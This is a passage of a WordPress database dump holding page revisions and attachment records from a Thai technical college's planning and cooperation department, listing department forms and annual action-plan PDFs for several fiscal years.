(1663, 3, '2018-03-08 10:51:45', '2018-03-08 03:51:45', '<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1631 \" src=\"/wp-content/uploads/2018/03/7-3-2561-14-39-06.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<a href=\"http://www.technicrayong.ac.th/งานวางแผนและความร่วมมื\"><img class=\"aligncenter wp-image-1632 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-34-46.jpg\" alt=\"\" width=\"193\" height=\"246\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/งานวางแผนและความร่วมมื\"><img class=\"aligncenter wp-image-1633\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-39-27.jpg\" alt=\"\" width=\"375\" height=\"102\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1654 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-24-55.jpg\" alt=\"\" width=\"246\" height=\"308\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1635\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-43-12-300x79.jpg\" alt=\"\" width=\"376\" height=\"99\" />\r\n\r\n<img class=\"aligncenter wp-image-1655 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-25-12.jpg\" alt=\"\" width=\"306\" height=\"334\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1638\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-49-01.jpg\" alt=\"\" width=\"194\" height=\"241\" />\r\n\r\n<img class=\"aligncenter wp-image-1639\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-49-18-300x80.jpg\" alt=\"\" width=\"376\" height=\"100\" />\r\n\r\n<img class=\"aligncenter size-medium wp-image-1656\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-25-57-221x300.jpg\" alt=\"\" width=\"221\" height=\"300\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1642\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-57-37.jpg\" alt=\"\" width=\"202\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1643\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-53-30-300x81.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter size-medium wp-image-1657\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-26-35-223x300.jpg\" alt=\"\" width=\"223\" height=\"300\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1646\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-21.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1647\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-34-300x80.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1648 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-05-03.jpg\" alt=\"\" width=\"506\" height=\"323\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1652\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-22-50.jpg\" alt=\"\" width=\"191\" height=\"237\" />\r\n\r\n<img class=\"aligncenter wp-image-1650\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-21-54-300x81.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"aligncenter wp-image-1651 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-21-30.jpg\" alt=\"\" width=\"543\" height=\"317\" />\r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายแผนงานและความร่วมมือ', '', 'inherit', 'closed', 'closed', '', '1588-revision-v1', '', '', '2018-03-08 10:51:45', '2018-03-08 03:51:45', '', 1588, 'http://www.technicrayong.ac.th/1588-revision-v1/', 0, 'revision', '', 0),
(1664, 3, '2018-03-08 10:53:18', '2018-03-08 03:53:18', '', 'แบบฟอร์ม สผ.งาน', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9a%e0%b8%9a%e0%b8%9f%e0%b8%ad%e0%b8%a3%e0%b9%8c%e0%b8%a1-%e0%b8%aa%e0%b8%9c-%e0%b8%87%e0%b8%b2%e0%b8%99-2', '', '', '2018-03-08 10:53:18', '2018-03-08 03:53:18', '', 1659, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/แบบฟอร์ม-สผ.งาน-1-1.doc', 0, 'attachment', 'application/msword', 0),
(1665, 3, '2018-03-08 10:53:59', '2018-03-08 03:53:59', '', 'แบบฟอร์ม สผ.แผนก', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9a%e0%b8%9a%e0%b8%9f%e0%b8%ad%e0%b8%a3%e0%b9%8c%e0%b8%a1-%e0%b8%aa%e0%b8%9c-%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81-2', '', '', '2018-03-08 10:53:59', '2018-03-08 03:53:59', '', 1659, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/แบบฟอร์ม-สผ.แผนก-1-1.doc', 0, 'attachment', 'application/msword', 0),
(1666, 3, '2018-03-08 10:55:13', '2018-03-08 03:55:13', '', 'แบบฟอร์มโครงการ', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9a%e0%b8%9a%e0%b8%9f%e0%b8%ad%e0%b8%a3%e0%b9%8c%e0%b8%a1%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3', '', '', '2018-03-08 10:55:13', '2018-03-08 03:55:13', '', 1659, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/แบบฟอร์มโครงการ.xls', 0, 'attachment', 'application/vnd.ms-excel', 0),
(1667, 3, '2018-03-08 10:57:31', '2018-03-08 03:57:31', '', 'แบบฟอร์มรายงานผลการปฏิบัติงานตามแผนปฏิบัติการ', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9a%e0%b8%9a%e0%b8%9f%e0%b8%ad%e0%b8%a3%e0%b9%8c%e0%b8%a1%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%8f%e0%b8%b4', '', '', '2018-03-08 10:57:31', '2018-03-08 03:57:31', '', 1659, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/แบบฟอร์มรายงานผลการปฏิบัติงานตามแผนปฏิบัติการ.xls', 0, 'attachment', 'application/vnd.ms-excel', 0),
(1668, 3, '2018-03-08 11:00:09', '2018-03-08 04:00:09', '', 'ตัวบ่งชี้ สถานศึกษารางวัลพระราชทาน', '', 'inherit', 'closed', 'closed', '', '%e0%b8%95%e0%b8%b1%e0%b8%a7%e0%b8%9a%e0%b9%88%e0%b8%87%e0%b8%8a%e0%b8%b5%e0%b9%89-%e0%b8%aa%e0%b8%96%e0%b8%b2%e0%b8%99%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b8%a7', '', '', '2018-03-08 11:00:09', '2018-03-08 04:00:09', '', 1659, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/ตัวบ่งชี้-สถานศึกษารางวัลพระราชทาน.pdf', 0, 'attachment', 'application/pdf', 0),
(1669, 3, '2018-03-08 11:00:45', '2018-03-08 04:00:45', '', 'ตัวบ่งชี้การประเมินคุณภาพภายนอก สมศ_', '', 'inherit', 'closed', 'closed', '', '%e0%b8%95%e0%b8%b1%e0%b8%a7%e0%b8%9a%e0%b9%88%e0%b8%87%e0%b8%8a%e0%b8%b5%e0%b9%89%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99%e0%b8%84%e0%b8%b8%e0%b8%93', '', '', '2018-03-08 11:00:45', '2018-03-08 04:00:45', '', 1659, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/ตัวบ่งชี้การประเมินคุณภาพภายนอก-สมศ_.pdf', 0, 'attachment', 'application/pdf', 0),
(1670, 3, '2018-03-08 11:01:23', '2018-03-08 04:01:23', '', 'ตัวบ่งชี้มาตรฐานอาชีวศึกษา สอศ.', '', 'inherit', 'closed', 'closed', '', '%e0%b8%95%e0%b8%b1%e0%b8%a7%e0%b8%9a%e0%b9%88%e0%b8%87%e0%b8%8a%e0%b8%b5%e0%b9%89%e0%b8%a1%e0%b8%b2%e0%b8%95%e0%b8%a3%e0%b8%90%e0%b8%b2%e0%b8%99%e0%b8%ad%e0%b8%b2%e0%b8%8a%e0%b8%b5%e0%b8%a7%e0%b8%a8', '', '', '2018-03-08 11:01:23', '2018-03-08 04:01:23', '', 1659, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/ตัวบ่งชี้มาตรฐานอาชีวศึกษา-สอศ..pdf', 0, 'attachment', 'application/pdf', 0),
(1671, 3, '2018-03-08 11:03:18', '2018-03-08 04:03:18', '', 'แผนปฏิบัติราชการ-สำหรับสถานศึกษา2561', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%a3%e0%b8%b2%e0%b8%8a%e0%b8%81%e0%b8%b2%e0%b8%a3-%e0%b8%aa%e0%b8%b3%e0%b8%ab%e0%b8%a3%e0%b8%b1%e0%b8%9a', '', '', '2018-03-08 11:03:18', '2018-03-08 04:03:18', '', 1659, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/แผนปฏิบัติราชการ-สำหรับสถานศึกษา2561.pdf', 0, 'attachment', 'application/pdf', 0),
(1673, 3, '2018-03-08 11:08:22', '2018-03-08 04:08:22', '<img class=\"aligncenter size-full wp-image-1632\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-34-46.jpg\" alt=\"\" width=\"193\" height=\"246\" />\r\n\r\n<img class=\"aligncenter wp-image-1633\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-39-27-300x82.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"aligncenter size-medium wp-image-1654\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-24-55-240x300.jpg\" alt=\"\" width=\"240\" height=\"300\" />\r\n<h3><a href=\"http://www.technicrayong.ac.th/ข้อมูลงบประมาณ61\"><span style=\"color: #ff0000;\">--->ข้อมูลงบประมาณ ปีงบประมาณ 2561<---</span></a></h3>\r\n<h4><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์ม-สผ.งาน-1-1.doc\">** แบบฟอร์ม สผ.งาน</a></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์ม-สผ.แผนก-1-1.doc\">** แบบฟอร์ม สผ.แผนก</a></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์มโครงการ.xls\">** แบบฟอร์มโครงการ</a></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์มรายงานผลการปฏิบัติงานตามแผนปฏิบัติการ.xls\">** แบบฟอร์มรายงานผลการปฏิบัติงานตามแผนปฏิบัติการ</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/ตัวบ่งชี้-สถานศึกษารางวัลพระราชทาน.pdf\">** ตัวบ่งชี้ สถานศึกษารางวัลพระราชทาน</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/ตัวบ่งชี้การประเมินคุณภาพภายนอก-สมศ_.pdf\">** ตัวบ่งชี้การประเมินคุณภาพภายนอก สมศ.</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/ตัวบ่งชี้มาตรฐานอาชีวศึกษา-สอศ..pdf\">** ตัวบ่งชี้มาตรฐานอาชีวศึกษา สอศ.</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนปฏิบัติราชการ-สำหรับสถานศึกษา2561.pdf\">** แผนปฏิบัติราชการ ปีงบประมาณ 2561</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\">** <a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนโครงการกิจกรรมชมรมวิชาชีพและองค์การว.pdf\">แผนโครงการกิจกรรมชมรมวิชาชีพ กิจกรรมองค์การวิชาชีพ ปีงบประมาณ 2561 (ภาคเรียนที่ 2/2560, 1/2561)</a></span></h4>\r\n \r\n\r\n ', 'งานวางแผนและความร่วมมือ', '', 'inherit', 'closed', 'closed', '', '1659-revision-v1', '', '', '2018-03-08 11:08:22', '2018-03-08 04:08:22', '', 1659, 'http://www.technicrayong.ac.th/1659-revision-v1/', 0, 'revision', '', 0),
(1674, 3, '2018-03-08 11:10:04', '2018-03-08 04:10:04', '<img class=\"aligncenter size-full wp-image-1632\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-34-46.jpg\" alt=\"\" width=\"193\" height=\"246\" />\r\n\r\n<img class=\"aligncenter wp-image-1633\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-39-27-300x82.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"aligncenter size-medium wp-image-1654\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-24-55-240x300.jpg\" alt=\"\" width=\"240\" height=\"300\" />\r\n<h3><a href=\"/ข้อมูลงบประมาณ61\"><span style=\"color: #ff0000;\">--->ข้อมูลงบประมาณ ปีงบประมาณ 2561<---</span></a></h3>\r\n<h4><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์ม-สผ.งาน-1-1.doc\">** แบบฟอร์ม สผ.งาน</a></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์ม-สผ.แผนก-1-1.doc\">** แบบฟอร์ม สผ.แผนก</a></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์มโครงการ.xls\">** แบบฟอร์มโครงการ</a></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์มรายงานผลการปฏิบัติงานตามแผนปฏิบัติการ.xls\">** แบบฟอร์มรายงานผลการปฏิบัติงานตามแผนปฏิบัติการ</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนปฏิบัติราชการ-สำหรับสถานศึกษา2561.pdf\">** แผนปฏิบัติราชการ ปีงบประมาณ 2561</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\">** <a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนโครงการกิจกรรมชมรมวิชาชีพและองค์การว.pdf\">แผนโครงการกิจกรรมชมรมวิชาชีพ กิจกรรมองค์การวิชาชีพ ปีงบประมาณ 2561 (ภาคเรียนที่ 2/2560, 1/2561)</a></span></h4>\r\n \r\n\r\n ', 'งานวางแผนและความร่วมมือ', '', 'inherit', 'closed', 'closed', '', '1659-revision-v1', '', '', '2018-03-08 11:10:04', '2018-03-08 04:10:04', '', 1659, 'http://www.technicrayong.ac.th/1659-revision-v1/', 0, 'revision', '', 0),
(1675, 3, '2018-03-08 11:14:41', '2018-03-08 04:14:41', '<img class=\"aligncenter size-full wp-image-1632\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-34-46.jpg\" alt=\"\" width=\"193\" height=\"246\" />\r\n\r\n<img class=\"aligncenter wp-image-1633\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-39-27-300x82.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"aligncenter size-medium wp-image-1654\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-24-55-240x300.jpg\" alt=\"\" width=\"240\" height=\"300\" />\r\n<h3><a href=\"/ข้อมูลงบประมาณ61\"><span style=\"color: #ff0000;\">--->ข้อมูลงบประมาณ ปีงบประมาณ 2561<---</span></a></h3>\r\n<h4><span style=\"color: #ff6600;\">** แผนปฏิบัติราชการ</span></h4>\r\n<h4><span style=\"color: #ff6600;\">** แผนพัฒนาสถานศึกษา </span></h4>\r\n<h4><span style=\"color: #ff6600;\">** แผนโครงการกิจกรรมชมรมวิชาชีพ กิจกรรมองค์การวิชาชีพ </span></h4>\r\n<h4><span style=\"color: #ff00ff;\">** รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ</span></h4>\r\n<h4><span style=\"color: #339966;\">** ปฏิทินปฏิบัติงาน</span></h4>\r\n<h4><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์ม-สผ.งาน-1-1.doc\">** แบบฟอร์ม สผ.งาน</a></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์ม-สผ.แผนก-1-1.doc\">** แบบฟอร์ม สผ.แผนก</a></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์มโครงการ.xls\">** แบบฟอร์มโครงการ</a></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์มรายงานผลการปฏิบัติงานตามแผนปฏิบัติการ.xls\">** แบบฟอร์มรายงานผลการปฏิบัติงานตามแผนปฏิบัติการ</a></span></h4>\r\n<h4></h4>\r\n \r\n\r\n \r\n\r\n ', 'งานวางแผนและความร่วมมือ', '', 'inherit', 'closed', 'closed', '', '1659-revision-v1', '', '', '2018-03-08 11:14:41', '2018-03-08 04:14:41', '', 1659, 'http://www.technicrayong.ac.th/1659-revision-v1/', 0, 'revision', '', 0),
(1676, 3, '2018-03-08 13:47:07', '2018-03-08 06:47:07', '<h3><a href=\"/%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%8e%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%95-4/\"><strong><span style=\"color: #ff0000;\">-->แผนปฏิบัติราชการ ปีงบประมาณ 2565<-- NEW!</span></strong></a></h3>\r\n<h4><strong><a href=\"/%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%a3%e0%b8%b2%e0%b8%8a%e0%b8%81%e0%b8%b2%e0%b8%a3-%e0%b8%9b%e0%b8%b5%e0%b8%87%e0%b8%9a%e0%b8%9b%e0%b8%a3/\"><span style=\"color: #ff0000;\">-->แผนปฏิบัติราชการ ปีงบประมาณ 2564<-- </span></a></strong></h4>\r\n<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2019/12/รูปเล่มแผนปฏิบัติราชการ-ประจำปีงบประมาณ-256.pdf\">-->แผนปฏิบัติราชการ ปีงบประมาณ 2563<--</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/12/แผนปฏิบัติราชการ-ประจำปีงบประมาณ62-2.pdf\">-->แผนปฏิบัติราชการ ปีงบประมาณ 2562<--</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนปฏิบัติราชการ-สำหรับสถานศึกษา2561-1.pdf\">-->แผนปฏิบัติราชการ ปีงบประมาณ 2561<--</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนปฏิบัติการปีงบประมาณ2560.pdf\">-->แผนปฏิบัติราชการ ปีงบประมาณ 2560<--</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนปฏิบัติการปีงบประมาณ-2559.pdf\">-->แผนปฏิบัติราชการ ปีงบประมาณ 2559<--</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\">--><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนปฏิบัติราชการ2558.pdf\">แผนปฏิบัติราชการ ปีงบประมาณ 2558<--</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนปฏิบัติการ-2557.pdf\">-->แผนปฏิบัติราชการ ปีงบประมาณ 2557<--</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนปฏิบัติการปีงบประมาณ-2556-.pdf\">-->แผนปฏิบัติราชการ ปีงบประมาณ 2556<--</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/ปีงบประมาณ-2555n.pdf\">-->แผนปฏิบัติราชการ ปีงบประมาณ 2555<--</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/2554.pdf\">-->แผนปฏิบัติราชการ ปีงบประมาณ 2554<--</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนปฏิบัติการ-2553.pdf\">-->แผนปฏิบัติราชการ ปีงบประมาณ 2553<--</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนปฏิบัติราชการ-สำหรับสถานศึกษา2552.pdf\">-->แผนปฏิบัติราชการ ปีงบประมาณ 2552<--</a></span></h4>\r\n ', 'แผนปฏิบัติราชการ', '', 'publish', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%a3%e0%b8%b2%e0%b8%8a%e0%b8%81%e0%b8%b2%e0%b8%a3', '', '', '2021-11-25 09:50:13', '2021-11-25 02:50:13', '', 0, 'http://www.technicrayong.ac.th/?page_id=1676', 0, 'page', '', 0),
(1677, 3, '2018-03-08 13:40:56', '2018-03-08 06:40:56', '', 'แผนปฏิบัติราชการ-สำหรับสถานศึกษา2561', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%a3%e0%b8%b2%e0%b8%8a%e0%b8%81%e0%b8%b2%e0%b8%a3-%e0%b8%aa%e0%b8%b3%e0%b8%ab%e0%b8%a3%e0%b8%b1-2', '', '', '2018-03-08 13:40:56', '2018-03-08 06:40:56', '', 1676, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/แผนปฏิบัติราชการ-สำหรับสถานศึกษา2561-1.pdf', 0, 'attachment', 'application/pdf', 0),
(1678, 3, '2018-03-08 13:41:13', '2018-03-08 06:41:13', '', 'แผนปฏิบัติการปีงบประมาณ2560', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%b5%e0%b8%87%e0%b8%9a%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%a1%e0%b8%b2', '', '', '2018-03-08 13:41:13', '2018-03-08 06:41:13', '', 1676, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/แผนปฏิบัติการปีงบประมาณ2560.pdf', 0, 'attachment', 'application/pdf', 0),
(1679, 3, '2018-03-08 13:41:25', '2018-03-08 06:41:25', '', 'แผนปฏิบัติการปีงบประมาณ 2559', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%b5%e0%b8%87%e0%b8%9a%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%a1%e0%b8%b2-2', '', '', '2018-03-08 13:41:25', '2018-03-08 06:41:25', '', 1676, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/แผนปฏิบัติการปีงบประมาณ-2559.pdf', 0, 'attachment', 'application/pdf', 0),
(1680, 3, '2018-03-08 13:41:36', '2018-03-08 06:41:36', '', 'แผนปฏิบัติราชการ2558', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%a3%e0%b8%b2%e0%b8%8a%e0%b8%81%e0%b8%b2%e0%b8%a32558', '', '', '2018-03-08 13:41:36', '2018-03-08 06:41:36', '', 1676, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/แผนปฏิบัติราชการ2558.pdf', 0, 'attachment', 'application/pdf', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1681, 3, '2018-03-08 13:41:56', '2018-03-08 06:41:56', '', 'แผนปฏิบัติการ 2557', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%81%e0%b8%b2%e0%b8%a3-2557', '', '', '2018-03-08 13:41:56', '2018-03-08 06:41:56', '', 1676, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/แผนปฏิบัติการ-2557.pdf', 0, 'attachment', 'application/pdf', 0),
(1682, 3, '2018-03-08 13:42:26', '2018-03-08 06:42:26', '', 'ปีงบประมาณ 2555n', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%b5%e0%b8%87%e0%b8%9a%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%a1%e0%b8%b2%e0%b8%93-2555n', '', '', '2018-03-08 13:42:26', '2018-03-08 06:42:26', '', 1676, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/ปีงบประมาณ-2555n.pdf', 0, 'attachment', 'application/pdf', 0),
(1683, 3, '2018-03-08 13:42:35', '2018-03-08 06:42:35', '', 'แผนปฏิบัติการ 2553', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%81%e0%b8%b2%e0%b8%a3-2553', '', '', '2018-03-08 13:42:35', '2018-03-08 06:42:35', '', 1676, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/แผนปฏิบัติการ-2553.pdf', 0, 'attachment', 'application/pdf', 0),
(1684, 3, '2018-03-08 13:47:07', '2018-03-08 06:47:07', '<a href=\"/wp-content/uploads/2018/03/แผนปฏิบัติราชการ-สำหรับสถานศึกษา2561-1.pdf\">-->แผนปฏิบัติราชการ ปีงบประมาณ 2561<--</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/03/แผนปฏิบัติการปีงบประมาณ2560.pdf\">-->แผนปฏิบัติราชการ ปีงบประมาณ 2560<--</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/03/แผนปฏิบัติการปีงบประมาณ-2559.pdf\">-->แผนปฏิบัติราชการ ปีงบประมาณ 2559<--</a>\r\n\r\n--><a href=\"/wp-content/uploads/2018/03/แผนปฏิบัติราชการ2558.pdf\">แผนปฏิบัติราชการ ปีงบประมาณ 2558<--</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/03/แผนปฏิบัติการ-2557.pdf\">-->แผนปฏิบัติราชการ ปีงบประมาณ 2557<--</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/03/ปีงบประมาณ-2555n.pdf\">-->แผนปฏิบัติราชการ ปีงบประมาณ 2555<--</a>\r\n\r\n<a 